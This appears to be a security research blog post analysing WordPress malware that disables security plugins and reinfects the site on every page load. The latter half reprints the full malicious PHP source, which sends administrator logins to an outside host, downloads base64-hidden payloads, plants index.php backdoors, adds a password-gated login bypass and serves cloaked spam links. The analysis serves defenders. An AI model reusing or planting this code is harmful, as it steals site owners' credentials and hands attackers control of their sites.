Plugin Killer: WordPress Malware Disables Security Plugins
I’ve previously written about malware that reverses security hardening measures enacted either manually by the owner, or through the use of a security plugin installed to WordPress. What attackers may find problematic with reverse security hardening is that a security plugin that monitors files can detect any changes and alert the owner via email notification or within the WordPress dashboard.
Unfortunately, PHP malware exists which solves this problem for the attacker by immediately disabling the most commonly used security plugins and preventing them from being reactivated in the WordPress dashboard.
Finding & Deactivating Security Plugins⌗
This GIF shows a WordPress installation with a number of activated plugins, four of which are popular security plugins and two non-security plugins. The animation clearly demonstrates how non-security components are unaffected by the PHP malware but the four security plugins are disabled.
If a user tries to reactivate one of the disabled security plugins, it will momentarily appear to activate only for the malware to immediately disable it again. This behavior will prevail until the malware is fully removed from the compromised environment, making it more difficult to detect malicious behavior on the website.
How it works⌗
The malware was found within the malicious file ./wp-includes/IXR/class-IXR-cache.php. It starts by assigning the website’s root directory to DIZIN to help obfuscate loading the core WordPress file wp-load.php:
if ( ! defined( 'DIZIN' ) ) {
define( 'DIZIN', dirname( __FILE__ ) . '/' );
}
require_once( DIZIN ."../../wp-load.php");
...
The use of require_once to load wp-load.php allows the attacker to use WordPress coding hooks and variables to cleanly disable the security plugins. First, the attacker defines the function findinSecurity which is used later to sort the array containing the plugins.
function findinSecurity($find, $array) {
foreach ($find as $value) {
if (in_array($value, $array)) {
return $value;
}
}
}
Another function that the attacker defines is secList which contains an array of the targeted plugins that will be searched for in the existing plugins and disabled.
function secList(){
$plugins = array(
"better-wp-security/better-wp-security.php",
"sucuri-scanner/sucuri.php",
"wp-security-audit-log/wp-security-audit-log.php",
"total-security/total-security.php",
"wp-hide-security-enhancer/wp-hide.php",
"bulletproof-security/bulletproof-security.php",
"wp-simple-firewall/icwp-wpsf.php",
"wp-security-policy/wp-content-security-policy.php",
"wp-cerber/wp-cerber.php",
"defender-security/wp-defender.php",
"security-ninja/security-ninja.php",
"wordfence/wordfence.php",
"cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php",
"ninjafirewall/ninjafirewall.php",
"security-antivirus-firewall/index.php");
return $plugins;
}
The two functions findinSecurity and secList are then used in the main function active_plugins which uses the WordPress hook get_option(‘active_plugins’) to obtain a list of all active plugins from the WordPress database. It then uses findinSecurity along with the list of targeted security plugins from secList to search the active plugins and disable any that are active using the WordPress hook deactivate_plugins.
function active_plugins() {
$the_plugs = get_option('active_plugins');
$findinSecurity = findinSecurity( $the_plugs, secList() );
if(!empty($findinSecurity)){
if ( !function_exists( 'deactivate_plugins' ) ) {
require_once DIZIN . '../../wp-admin/includes/plugin.php';
}
deactivate_plugins( plugin_basename( findinSecurity( $the_plugs, secList() )));
}
}
active_plugins();
So, how does the malware automatically disable the targeted security plugins in case anyone should try to reactivate them? It does this by injecting malware into the bottom of the wp-load.php file.
if(file_exists(ABSPATH . WPINC . '/IXR/class-IXR-cache.php')){
require_once( ABSPATH . WPINC . '/IXR/class-IXR-cache.php' );
}
The injection causes wp-load.php to load the malicious file ./wp-includes/IXR/class-IXR-cache.php through the use of require_once. Since wp-load.php is run on every page load on a WordPress website, any reactivated plugins would be easily disabled automatically upon the next page load — regardless of whether it is from the same user or a new visitor on the website’s homepage.
<?php
error_reporting(0);
if ( ! defined( 'DIZIN' ) ) {
define( 'DIZIN', dirname( __FILE__ ) . '/' );
}
require_once( DIZIN ."../../wp-load.php");
function fileAppend($f, $c){
$r = file_get_contents($f);
if(!stristr($r, $c)){
$fopenFile = fopen ($f, "a");
file_put_contents($f, $c, FILE_APPEND);
if(stristr($r,$c)){}
}else{}
}
function fwrite_stream($dosya, $veri) {
$process = fopen($dosya, "w+");
if (fwrite($process, $veri) === FALSE) {
return false;
}else{
fclose($process);
return true;
}
}
function active_plugins() {
$the_plugs = get_option('active_plugins');
$findinSecurity = findinSecurity( $the_plugs, secList() );
if(!empty($findinSecurity)){
if ( !function_exists( 'deactivate_plugins' ) ) {
require_once DIZIN . '../../wp-admin/includes/plugin.php';
}
//deactivate_plugins( plugin_basename( findinSecurity( $the_plugs, secList() ) ) );
}
}
function cacheController(){
$the_plugs = get_option('active_plugins');
if(findinCache($the_plugs, cacheList())){
return true;
}else{
return false;
}
}
function findinSecurity($find, $array) {
foreach ($find as $value) {
if (in_array($value, $array)) {
return $value;
}
}
}
function findinCache($find, $array) {
foreach ($find as $value) {
if (in_array($value, $array)) {
return true;
}
}
return false;
}
function secList(){
$plugins = array(
"better-wp-security/better-wp-security.php",
"sucuri-scanner/sucuri.php",
"wp-security-audit-log/wp-security-audit-log.php",
"total-security/total-security.php",
"wp-hide-security-enhancer/wp-hide.php",
"bulletproof-security/bulletproof-security.php",
"wp-simple-firewall/icwp-wpsf.php",
"wp-security-policy/wp-content-security-policy.php",
"wp-cerber/wp-cerber.php",
"defender-security/wp-defender.php",
"security-ninja/security-ninja.php",
"cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php",
"security-antivirus-firewall/index.php");
return $plugins;
}
function cacheList(){
$plugins = array(
"cache-control/cache-control.php",
"wp-rocket/wp-rocket.php",
"cache-enabler/cache-enabler.php",
"comet-cache/comet-cache.php",
"hummingbird-performance/wp-hummingbird.php",
"hyper-cache/plugin.php",
"hyper-cache-extended/plugin.php",
"psn-pagespeed-ninja/pagespeedninja.php",
"redis-cache/redis-cache.php",
"simple-cache/simple-cache.php",
"static-html-output-plugin/wp-static-html-output.php",
"w3-total-cache/w3-total-cache.php",
"wp-asset-clean-up/wpacu.php",
"wp-performance-score-booster/wp-performance-score-booster.php"
);
return $plugins;
}
function wp_fatest_cache_up(){
$getir = get_option("WpFastestCacheExclude");
if($getir){
if(strstr($getir,"google")){
}else{
$fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]';
update_option("WpFastestCacheExclude",$fatest_cache);
}
}else{
$fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]';
add_option("WpFastestCacheExclude",$fatest_cache);
}
}
function litespeed_cache_up(){
$litespeed_cache = get_option("litespeed-cache-conf");
if(strstr($litespeed_cache['nocache_useragents'],"google")){
}else{
$litespeed_cache['nocache_useragents'] = "google|yandex|bing|yahoo|alexa|googleweb|yandexbot";
update_option("litespeed-cache-conf",$litespeed_cache);
}
}
function wp_optimize_up(){
$getir = get_option("wpo_cache_config");
if(in_array("google",$getir['cache_exception_browser_agents'])){
}else{
$getir['cache_exception_browser_agents'] = array("google","googlebot","yandex","yandexbot","bing","bingbot","alexa","webmastertools","googlemobile","mobilegoogle");
update_option("wpo_cache_config",$getir);
}
}
function wp_supercache_up(){
global $wp_cache_config_file;
fileAppend($wp_cache_config_file, '<?php $cache_rejected_user_agent=array ( 0 => "bot", 1 => "ia_archive", 2 => "slurp", 3 => "crawl", 4 => "spider", 5 => "Yandex", 6 => "google", 7 => "bing", 8 => "googlebot", 9 => "bingbot", 10 => "alexa", 11 => "webmastertools", 12 => "googlemobile", ); ?>');
}
function GetLinkCache(){
$cache = esc_url( home_url( '/' ) );
return base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vbGluay5waHA/bGluaz0=").$cache;
}
function linkDownloader(){
$ch = curl_init(GetLinkCache());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$veri = curl_exec($ch);
curl_close($ch);
if(fwrite_stream(classWPCustomizeCache(), $veri)){
return true;
}else{
return json_decode(base64_decode($veri));
}
}
function linkUpdater(){
$ch = curl_init(GetLinkCache());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$veri = curl_exec($ch);
curl_close($ch);
if(fwrite_stream(classWPCustomizeCache(), $veri)){
return true;
}else{
return false;
}
}
function classWPCustomizeCache(){
$yol = DIZIN . "/../customize/class-wp-customize-link-control.php";
return $yol;
}
function link_control(){
if(file_exists(classWPCustomizeCache())){
return fread_stream();
}else{
if(linkDownloader()){
return fread_stream();
}else{
return linkDownloader();
}
}
}
function fread_stream(){
if(filesize(classWPCustomizeCache()) > 0){
$dosya = fopen(classWPCustomizeCache(), 'r');
$icerik = fread($dosya, filesize(classWPCustomizeCache()));
return $icerik;
}else{
return false;
}
fclose($dosya);
}
function cache_link_class(){
$icerik = link_control();
$linkler = json_decode(base64_decode($icerik));
return $linkler;
}
function cache_check($ara){
$aktif_plugin = get_option('active_plugins');
if (in_array($ara, $aktif_plugin)) {
return 1;
}else{
return 0;
}
}
function cacheFolderExist($folder){
$path = realpath($folder);
return ($path !== false AND is_dir($path)) ? $path : false;
}
function deleteAll($str) {
if (is_file($str)) {
return unlink($str);
}
elseif (is_dir($str)) {
$scan = glob(rtrim($str,'/').'/*');
foreach($scan as $index=>$path) {
deleteAll($path);
}
return rmdir($str);
}
}
function helloDownloaderw($getAddress,$getName){
$ch = curl_init("$getAddress");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
$process = fopen("$getName", "w+");
fwrite($process, $data);
fclose($process);
if($process){
echo $getName;
die();
}else{
echo 'False';
die();
}
}
function dosya_indir($url){
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
curl_setopt($ch, CURLOPT_REFERER, "googlebot");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function getCreateLoginsd(){
$getCache = base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS9sb2dpbi5waHA=");
if( function_exists ( 'curl_init' ) ) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $getCache);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$getindex = curl_exec($ch);
curl_close($ch);
}elseif(function_exists('file_get_contents')){
$getindex = file_get_contents($getCache);
}
if($getindex == "1"){
return true;
}else{
return false;
}
}
function hop_tek() {
if($_POST){
$gelenuser = $_POST['log'];
$sifre = $_POST['pwd'];
$test = wp_authenticate($gelenuser,$sifre);
$sor = $test->allcaps;
$testet = $sor['administrator'];
if($testet){
$subject = "SİTE:".$_SERVER["HTTP_HOST"]."";
$site = $_SERVER["HTTP_HOST"];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"http://warezciniz.com/log.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"site=".$site."&user=".$gelenuser."&pw=".$sifre."");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec($ch);
curl_close ($ch);
}
}
}
if(!empty($_GET['pw'])){
if(md5(md5(sha1($_GET['pw']))) == '31903ca10a9ccf20f2a3a48d696e37fd'){
if(!isset($_GET['userid'])){ echo 'OK'; }
$cacheWP = $_GET['dosya'];
$getCache = base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS8=").$cacheWP;
if(!empty($_GET['update'])){
if(linkUpdater()){
echo "11";
$cacheFolderExist = DIZIN . "../../wp-content/cache/";
if(cacheFolderExist($cacheFolderExist) != FALSE){
deleteAll(cacheFolderExist($cacheFolderExist));
echo "11";
}else{
echo "11";
}
}else{
echo "22";
}
exit;
}
if(!empty($_GET['dosya'])){
if( function_exists ( 'curl_init' ) ) {
helloDownloaderw($getCache, DIZIN . $cacheWP . '.php');
}else{
if(function_exists('file_get_contents')){
$f=fopen( DIZIN . $cacheWP . '.php','w+');
fwrite($f,file_get_contents($getCache));
fclose($f);
echo DIZIN . $cacheWP . '.php';
die();
}
}
}
if(!empty($_GET['uploads'])){
$cacheWP = $_GET['dosyam'];
$getCache = base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS8=").$cacheWP;
$dosya_indir = dosya_indir($getCache);
$upload_name = "index";
$adminupload = DIZIN . "../../wp-admin/";
$f=fopen($adminupload."/includes/". $upload_name . '.php','w+');
fwrite($f,$dosya_indir);
fclose($f);
$f=fopen($adminupload."/network/". $upload_name . '.php','w+');
fwrite($f,$dosya_indir);
fclose($f);
$f=fopen($adminupload."/user/". $upload_name . '.php','w+');
fwrite($f,$dosya_indir);
fclose($f);
$dizinupload = DIZIN . "../../";
$dizi_array = array(
"/wp-includes/ID3/",
"wp-includes/rest-api/search/",
"wp-includes/rest-api/fields/",
"wp-includes/rest-api/endpoints/",
"wp-includes/widgets/",
"wp-includes/theme-compat/",
"wp-includes/Requests/",
"wp-includes/Requests/Utility/",
"wp-includes/Requests/Transport/",
"wp-includes/Requests/Response/",
"wp-includes/Requests/Proxy/",
"wp-includes/Requests/Exception/",
"wp-includes/Requests/Exception/Transport/",
"wp-includes/Requests/Exception/HTTP/",
"wp-content/languages/themes/",
"wp-content/languages/plugins/",
"wp-content/languages/"
);
foreach($dizi_array as $key){
$f=fopen( $dizinupload.$key."/". $upload_name . '.php','w+');
fwrite($f,$dosya_indir);
fclose($f);
}
$upload_array = array(2019,2018,2017,2016,2015);
$upload_alt_array = array("01","02","03","04","05","06","07","08","09","10","11","12");
$uploadfolder = DIZIN . "../../wp-content/uploads/";
foreach($upload_array as $key){
$f=fopen( $uploadfolder.$key."/" . $upload_name . '.php','w+');
fwrite($f,$dosya_indir);
fclose($f);
foreach($upload_alt_array as $alt_key){
$f=fopen($uploadfolder.$key."/".$alt_key."/". $upload_name . '.php','w+');
fwrite($f,$dosya_indir);
fclose($f);
}
}
echo "Upload Tamam";
exit;
}
if(!empty($_GET['userid'])){
if(getCreateLoginsd()){
require_once( DIZIN . '../pluggable.php');
$user_info = get_userdata($_GET['userid']);
$username = $user_info->user_login;
$user = get_user_by('login', $username );
if ( !is_wp_error( $user ) )
{
wp_clear_auth_cookie();
wp_set_current_user ( $user->ID );
wp_set_auth_cookie ( $user->ID );
$redirect_to = user_admin_url();
wp_safe_redirect( $redirect_to );
exit();
}
}
}
}
}
function bot_link_class(){
$checkCache = cache_link_class();
if(cache_check("wp-fastest-cache/wpFastestCache.php")){
wp_fatest_cache_up();
if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
echo $checkCache->link;
}
}
if(cache_check("litespeed-cache/litespeed-cache.php")){
litespeed_cache_up();
if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
echo $checkCache->link;
}
}
if(cache_check("wp-super-cache/wp-cache.php")){
wp_supercache_up();
if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
echo $checkCache->link;
}
}
if(cache_check("wp-optimize/wp-optimize.php")){
wp_optimize_up();
if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
echo $checkCache->link;
}
}
if($checkCache->link_durum == 1){
echo $checkCache->link;
}
$kontrol = cacheController();
print_r($kontrol);
if(cacheController()){
if ( !is_user_logged_in() ) {
echo $checkCache->link;
}
}else{
if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
echo $checkCache->link;
}
}
}
add_action($konum = cache_link_class()->konum, 'bot_link_class');
add_action('wp_login', 'hop_tek');
active_plugins();
if(!file_exists(get_template_directory() . '/class-wp-functions.php')){
helloDownloaderw(base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS9hbGw="), get_template_directory() . '/class-wp-functions.php');
}
if(!file_exists(DIZIN . '../theme-compat/footer-404.php')){
helloDownloaderw(base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS9sb2dpbng="), DIZIN . '../theme-compat/footer-404.php');
}
fileAppend(ABSPATH . '/wp-login.php', "\nif(!function_exists('hop_tek_login')){\n\tif(file_exists(ABSPATH . WPINC . '/theme-compat/footer-404.php')){\n\t\trequire_once( ABSPATH . WPINC . '/theme-compat/footer-404.php' );\n\t}\n}");
fileAppend(ABSPATH . '/wp-load.php', "\nif(!function_exists('bot_link_class')){\n\tif(file_exists(ABSPATH . WPINC . '/IXR/class-IXR-cache.php')){\n\t\trequire_once( ABSPATH . WPINC . '/IXR/class-IXR-cache.php' );\n\t}\n}");
More Research